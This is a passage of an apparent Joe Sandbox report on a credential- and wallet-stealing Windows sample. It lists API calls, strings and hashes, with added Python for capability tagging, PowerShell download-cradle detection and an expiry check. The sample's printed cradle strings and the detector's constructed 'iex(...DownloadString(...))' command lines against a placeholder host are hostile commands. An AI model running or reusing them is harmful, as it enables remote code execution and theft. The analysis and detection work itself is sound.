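  • Opcode ID: b3637c3c3f8aac6c573ba226f03fb73d1d2324de4932ff40ed4f5c60b0111ca8
APIs
  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E25011
  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E25041
  • String ID:
  • Opcode ID: 8f54e1fcd4a6f20883f74456b82fabad61b6b57a4553e38ece80fb7d5ab60ccb
APIs
  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E38426
  • wsprintfA.USER32 ref: 00E38459
  • String ID: %s\%s
  • Opcode ID: 2fc94e1414952b7527a9be5169659b70e9cf53fb6953db9cbbad1f9b66422a0d
APIs
  • RegOpenKeyExA.ADVAPI32(80000002,0195BBE8,00000000,00020119,00E376B9), ref: 00E3775B
  • RegQueryValueExA.ADVAPI32(00E376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E3777A
  • String ID: CurrentBuildNumber
  • Opcode ID: d24911f309100f7ab4173d26ac912b012044db2b8779c40ade73735cebe9f65e
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for key, rules in classify(recs).items():
        print(key, ", ".join(rules))
    print("capabilities:", capabilities(recs))
```

                        Feed it the full text of the report (for example the copied function records) instead of SAMPLE to get a capability list for the whole sample; the Opcode ID keys let you jump back to the record in the report. The rules are substring heuristics on what the report printed, so a function that builds the query string at runtime, or reaches wallet paths through a string the report did not resolve, will not trigger them.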
                        APIs
                        • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00E33AEE,?), ref: 00E392FC
                        • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00E39319
                        • CloseHandle.KERNEL32(000000FF), ref: 00E39327
                        Strings
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :$:
                        • API String ID: 1378416451-4250114551
                        • Opcode ID: 691a735b3c74926b4e5717880bb2048011f2ef27aa0531dedb67c05eb5eccdf8
                        • Instruction ID: be59d5b22b108d74bdd17dea0e58b364d76f750d209061bc6570439761a6d92f
                        • Opcode Fuzzy Hash: 691a735b3c74926b4e5717880bb2048011f2ef27aa0531dedb67c05eb5eccdf8
                        • Instruction Fuzzy Hash: 40F01975F44208EBDB20EAA0DC49B9E7BB9AB48710F108254F651B72C4D7B99A018B40
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                        • LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 6fbb6535f627e07b6ceedd5e71bc496058d6eacbf3738278a1adebb3809a48da
                        • Instruction ID: 15c782a1a95cbb88528d086f61c75c6babc53d2bd85ba550f57c5bef0732d91e
                        • Opcode Fuzzy Hash: 6fbb6535f627e07b6ceedd5e71bc496058d6eacbf3738278a1adebb3809a48da
                        • Instruction Fuzzy Hash: EC3118B4A00209EFDB24DF94D885BAE77B5FF48304F109158E901B7290D779AA41CFA0
                        APIs
                        • lstrcat.KERNEL32(?,0196F1F8), ref: 00E347DB
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34801
                        • lstrcat.KERNEL32(?,?), ref: 00E34820
                        • lstrcat.KERNEL32(?,?), ref: 00E34834
                        • lstrcat.KERNEL32(?,0195A538), ref: 00E34847
                        • lstrcat.KERNEL32(?,?), ref: 00E3485B
                        • lstrcat.KERNEL32(?,0196E6D8), ref: 00E3486F
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E38D90: GetFileAttributesA.KERNEL32(00000000,?,00E21B54,?,?,00E4564C,?,?,00E40E1F), ref: 00E38D9F
                          • Part of subcall function 00E34570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E34580
                          • Part of subcall function 00E34570: RtlAllocateHeap.NTDLL(00000000), ref: 00E34587
                          • Part of subcall function 00E34570: wsprintfA.USER32 ref: 00E345A6
                          • Part of subcall function 00E34570: FindFirstFileA.KERNEL32(?,?), ref: 00E345BD
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 43e635ab95de405bd902407199aca4b63f877cac0242d0f3d822655ac0b545ab
                        • Instruction ID: b095e17423b18fbe662a6c5861adf4e1215d2d32b1fd9b49dfa6f1225efb4d3c
                        • Opcode Fuzzy Hash: 43e635ab95de405bd902407199aca4b63f877cac0242d0f3d822655ac0b545ab
                        • Instruction Fuzzy Hash: D03165B2900318ABCB24F760DC89EED77BCAB58700F405599B359B6081DE75D789CB91
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E32D85
                        Strings
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E32CC4
                        • ')", xrefs: 00E32CB3
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E32D04
                        • <, xrefs: 00E32D39
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 8c20a4695ad25336ce33a9d1abd920b7a125ee4fc6e08fdeac13da92698c76a7
                        • Instruction ID: 8871e5282b2ab02c849c9a39d43c308af80ef1c999840edbce7db5087c6321dc
                        • Opcode Fuzzy Hash: 8c20a4695ad25336ce33a9d1abd920b7a125ee4fc6e08fdeac13da92698c76a7
                        • Instruction Fuzzy Hash: FC41DE71D10208AADB18FFA0D89ABDDBFB4AF10300F445169F146B7191DF746A8ACF92
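Added illustration, not part of the Joe Sandbox output: the strings at 00E32CB3 and 00E32CC4 are the two halves of a PowerShell download cradle (`-nop -c "iex(New-Object Net.WebClient).DownloadString('` ... `')"`), with a URL spliced between them at runtime, and the assembled command line is handed to ShellExecuteEx at 00E32D85. The `<` string (0x3C) passed to ShellExecuteEx is the 60-byte cbSize of a 32-bit SHELLEXECUTEINFOA, and the SysWOW64 path means the 32-bit PowerShell host is launched on 64-bit Windows, so process-creation telemetry that only watches the System32 host path would miss this. The Python below is a detector for this cradle shape over process command lines; the command lines, the placeholder URLs (example.invalid) and the indicator names are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation command lines for the example (not from the report).
# The first mirrors the cradle shape seen in the strings above, with a placeholder URL.
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -nop -c "
    "\"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\"",
    # Benign administrative use: PowerShell host, but no in-memory download-and-run.
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Variant with mixed case, hidden window and the iex alias spelled out.
    "powershell -NoP -NonI -W Hidden -C \"Invoke-Expression (New-Object Net.WebClient)"
    ".DownloadString('https://example.invalid/a')\"",
    "notepad.exe C:\\Users\\user\\notes.txt",
]

# Each indicator is one building block of the cradle; the names are ours, not vendor terms.
CRADLE_PATTERNS = {
    "powershell_host": re.compile(r"(?:^|\\)powershell(?:\.exe)?\b", re.I),
    "noprofile": re.compile(r"(?<!\S)-nop(?:rofile)?\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I),
    "download_method": re.compile(r"\.download(?:string|data|file)\s*\(", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


@dataclass
class Verdict:
    command_line: str
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    wow64_host: bool = False  # launched from SysWOW64, as this sample does

    @property
    def is_cradle(self) -> bool:
        # Require the full chain: PowerShell host, a download method and an
        # evaluation primitive. Host + download alone (a fetch-to-disk script)
        # is left to lower-severity rules.
        return {"powershell_host", "download_method", "invoke_expression"} <= set(self.indicators)


def analyze(cmdline: str) -> Verdict:
    """Classify one process command line and pull out any embedded URLs."""
    v = Verdict(cmdline)
    for name, rx in CRADLE_PATTERNS.items():
        if rx.search(cmdline):
            v.indicators.append(name)
    v.urls = URL_RE.findall(cmdline)
    v.wow64_host = "\\syswow64\\" in cmdline.lower()
    return v


def scan(cmdlines) -> list:
    """Return verdicts only for command lines that match the full cradle chain."""
    return [v for v in map(analyze, cmdlines) if v.is_cradle]


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(sorted(hit.indicators), hit.urls, "wow64" if hit.wow64_host else "native")
```

The extracted URL is the artefact worth pivoting on: it is the second-stage location the cradle fetches, and a hit from a SysWOW64 host spawned by an unsigned binary in a user-writable directory is the combination to alert on first.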
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E29F41
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 22de2b65b562fd33a5d66e4fdeb94635331bcf9c5d79d0b2752fcc95cb145b42
                        • Instruction ID: 4ab934f6fbb7e25b2836c9f48650c0484bf8929bb69afe53d687ae24ad55558a
                        • Opcode Fuzzy Hash: 22de2b65b562fd33a5d66e4fdeb94635331bcf9c5d79d0b2752fcc95cb145b42
                        • Instruction Fuzzy Hash: 80615F71A00218EBDB24EFA4DC9AFED77B5AF44300F049128F90A7B191EB746A45CB52
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0196E658,00000000,00020119,?), ref: 00E340F4
                        • RegQueryValueExA.ADVAPI32(?,0196F0C0,00000000,00000000,00000000,000000FF), ref: 00E34118
                        • RegCloseKey.ADVAPI32(?), ref: 00E34122
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34147
                        • lstrcat.KERNEL32(?,0196F0D8), ref: 00E3415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: a1d96028fba5fea6241a306fde185453b71b7fdee3c65cac888fb9a530c91f8f
                        • Instruction ID: a14148e1bd8dea5374f4d59bb0c7f9acccefbd01e6a5040093d82941fec9465f
                        • Opcode Fuzzy Hash: a1d96028fba5fea6241a306fde185453b71b7fdee3c65cac888fb9a530c91f8f
                        • Instruction Fuzzy Hash: F3418AB6D00108ABDB24FBA0EC46FEE777DBB98300F004598F65567185EA795B88CBD1
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00E3696C
                        • sscanf.NTDLL ref: 00E36999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E369B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E369C0
                        • ExitProcess.KERNEL32 ref: 00E369DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 35c2a3a9038a8bc383ce060c2e55f81e7f50135591dc9d15a88e5e54ec2d8fa0
                        • Instruction ID: df70c67201b526eb19af0326be6d27c0e94c61f62be9f94cae126a7dc6d8a62d
                        • Opcode Fuzzy Hash: 35c2a3a9038a8bc383ce060c2e55f81e7f50135591dc9d15a88e5e54ec2d8fa0
                        • Instruction Fuzzy Hash: F321EA75D00208AFCF08EFE4D949AEEBBB5BF48300F04852AE506B3254EB355605CBA5
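Added illustration, not part of the Joe Sandbox output: the call sequence above (GetSystemTime at 00E3696C, sscanf at 00E36999, two SystemTimeToFileTime conversions, ExitProcess at 00E369DA) has the shape of a hard-coded expiry check, in which a date string embedded in the binary is parsed into a SYSTEMTIME, both it and the current time are converted to FILETIME so they compare as plain 64-bit integers, and the process exits if the deadline has passed. The report records only the calls, not the sscanf format or the deadline value, so the `YYYY-MM-DD` format, the sample deadline (2024-12-31) and the function names in the Python below are assumptions for the example, not recovered from the sample. The practical point for an analyst is that a sample which reaches ExitProcess straight after this chain and does nothing else may simply be past its build's expiry; re-running with the sandbox clock set before the deadline is the first thing to try.

```python
import re
from datetime import datetime, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
_TICKS_PER_SECOND = 10_000_000

# Assumed deadline format for the example; the real format string passed to
# sscanf at 00E36999 is not visible in the report.
_DEADLINE_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})$")


def utc(year, month, day, hour=0, minute=0, second=0):
    """Build a timezone-aware UTC datetime, standing in for a SYSTEMTIME."""
    return datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, ms=0):
    """Python equivalent of SystemTimeToFileTime for a UTC SYSTEMTIME."""
    dt = datetime(year, month, day, hour, minute, second, ms * 1000, tzinfo=timezone.utc)
    delta = dt - _FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * _TICKS_PER_SECOND + delta.microseconds * 10


def parse_deadline(text):
    """sscanf-style parse of the embedded deadline string; None if it does not match."""
    m = _DEADLINE_RE.match(text)
    if not m:
        return None
    year, month, day = (int(g) for g in m.groups())
    return systemtime_to_filetime(year, month, day)


def should_exit(deadline_text, now):
    """Mirror the check: exit when `now` (a UTC datetime, standing in for
    GetSystemTime) is past the deadline. An unparseable deadline is treated
    as expired here; that is a choice for the example, not observed behaviour."""
    deadline_ft = parse_deadline(deadline_text)
    if deadline_ft is None:
        return True
    now_ft = systemtime_to_filetime(now.year, now.month, now.day, now.hour,
                                    now.minute, now.second, now.microsecond // 1000)
    return now_ft > deadline_ft


if __name__ == "__main__":
    deadline = "2024-12-31"  # constructed for the example
    for clock in (utc(2024, 10, 10), utc(2025, 3, 1)):
        print(clock.date(), "-> ExitProcess" if should_exit(deadline, clock) else "-> continue")
```

The two SystemTimeToFileTime calls are the tell: one converts the parsed deadline, the other the result of GetSystemTime, and FILETIME is used because a SYSTEMTIME structure cannot be compared with a single integer comparison.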
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0195BC20,00000000,00020119,?), ref: 00E37E5E
                        • RegQueryValueExA.ADVAPI32(?,0196E558,00000000,00000000,000000FF,000000FF), ref: 00E37E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00E37E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: d1f246254b89f753c6b859deea640213c7a2eebaef37dec73c07be85ea820ad4
                        • Instruction ID: 8e45ba2bd3653fd5c5afabf82713f268c7635ec9479c88c1090cb9ed17fe2973
                        • Opcode Fuzzy Hash: d1f246254b89f753c6b859deea640213c7a2eebaef37dec73c07be85ea820ad4
                        • Instruction Fuzzy Hash: 7E116AB1A44205EBDB20DF95DD4AFBBBBB8FB44B10F104119F646B7284D7796800CBA0
                        APIs
                        • StrStrA.SHLWAPI(0196F330,?,?,?,00E3140C,?,0196F330,00000000), ref: 00E3926C
                        • lstrcpyn.KERNEL32(0106AB88,0196F330,0196F330,?,00E3140C,?,0196F330), ref: 00E39290
                        • lstrlen.KERNEL32(?,?,00E3140C,?,0196F330), ref: 00E392A7
                        • wsprintfA.USER32 ref: 00E392C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: a94c8ef42619917484576b0b1fc8adbf6cf1e42369219960086bc718a44a76e8
                        • Instruction ID: cbbb6d408d271528d248352faefe28084d27225d18411eeb5e683e80d2b25209
                        • Opcode Fuzzy Hash: a94c8ef42619917484576b0b1fc8adbf6cf1e42369219960086bc718a44a76e8
                        • Instruction Fuzzy Hash: 9301C075600108FFCB14EFDCD948DAE7BB9FB48354F109548F949A7205C6799A40DB90
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E212B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E212BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E212D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E212F5
                        • RegCloseKey.ADVAPI32(?), ref: 00E212FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                         • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
